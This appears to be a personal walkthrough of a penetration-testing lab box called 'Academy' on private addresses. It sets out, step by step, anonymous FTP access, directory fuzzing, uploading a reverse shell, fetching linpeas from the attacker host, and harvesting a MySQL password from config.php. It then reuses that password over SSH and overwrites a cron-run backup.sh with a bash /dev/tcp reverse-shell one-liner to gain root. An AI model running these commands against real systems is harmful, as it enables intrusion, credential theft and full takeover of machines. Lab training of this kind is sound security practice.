Search

Academy

ftp to the open to anon server:

ftp 192.168.218.131

username: anonymous

password: anonymous

find files on FTP:

ls

download the file found:

get note.txt

exit and cat it on Kali

__________________________________________________________________________________________________________

Find directories on website:

Dirbuster:

dirbuster&

ffuf:

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.218.131/FUZZ

Upload reverse shell and open nc to listen to the port:

nc -nvlp 1234

go to tmp and download linpeas for privesc:

cd /tmp
pwd
wget http://ATTACKERMACHINE/linpeas.sh
SO
wget http://192.168.218.129/l

if dirbuster still running, it is using port 80. Need to run a server on python from linpeas folder:

cd /opt/linpeas

sudo python3 -m http.server 2222

on the victim, in tmp (this is where you have perms):

wget http://kali.eth0.ip.here:2222/linpeas.sh

check for information, we got:

/home/grimmie/backup.sh

-rw-r--r-- 1 grimmie administrator 807 May 29  2021 /home/grimmie/.profile

/var/www/html/academy/includes/config.php


$mysql_password = "My_V3ryS3cur3_P4ss";

We know there’s admin user called grimmie

We have a MySQL password that we could try with that user

We found a config.php file that we can read

reading the file:

$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";

We have the MySQL password but no real way to use it. We can try to login to ssh and testing for password reuse:

ssh grimmie@192.168.218.131
#when asked for password:
My_V3ryS3cur3_P4ss

We ls to find files and we see that backup.sh that we found earlier in linpeas.

We use pspy64 to find processes that are running. It scans real-time so leaving it run for a bit can show things that run every X number of minutes.

We found that backup.sh run every X number of minutes. As the user who created this file, we can nano it and make it our shell code (this is reverse shell one-liner):

bash -i >& /dev/tcp/192.168.218.128/8081 0>&1

and open a netcat listening for that connection on Kali:

nc -nvlp 8081

and wait for the script to run again.

Once we get root access, we can ls and cat files (or do whatever; we have root!)